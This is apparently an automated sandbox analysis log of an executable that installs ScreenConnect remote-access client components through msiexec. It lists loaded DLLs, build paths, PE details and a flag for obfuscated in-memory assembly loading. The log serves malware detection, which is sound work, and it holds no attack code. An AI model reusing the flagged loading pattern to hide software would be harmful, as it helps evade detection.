                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: tmpzNIZ0YQ.exeStatic PE information: certificate valid
                              Source: tmpzNIZ0YQ.exeStatic file information: File size 5809048 > 1048576
                              Source: tmpzNIZ0YQ.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x537600
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: tmpzNIZ0YQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: tmpzNIZ0YQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1477295453.000000000026D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tmpzNIZ0YQ.exe, MSI934C.tmp.3.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, 418a04.rbs.3.dr, MSI8E59.tmp.3.dr, MSI9148.tmp.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tmpzNIZ0YQ.exe, MSI7FE2.tmp.2.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1542649947.0000000001012000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tmpzNIZ0YQ.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: tmpzNIZ0YQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: tmpzNIZ0YQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: tmpzNIZ0YQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: tmpzNIZ0YQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: tmpzNIZ0YQ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.2.tmpzNIZ0YQ.exe.1c00000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: 0.0.tmpzNIZ0YQ.exe.116bcf4.1.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: tmpzNIZ0YQ.exeStatic PE information: real checksum: 0x550b20 should be: 0x58ce29
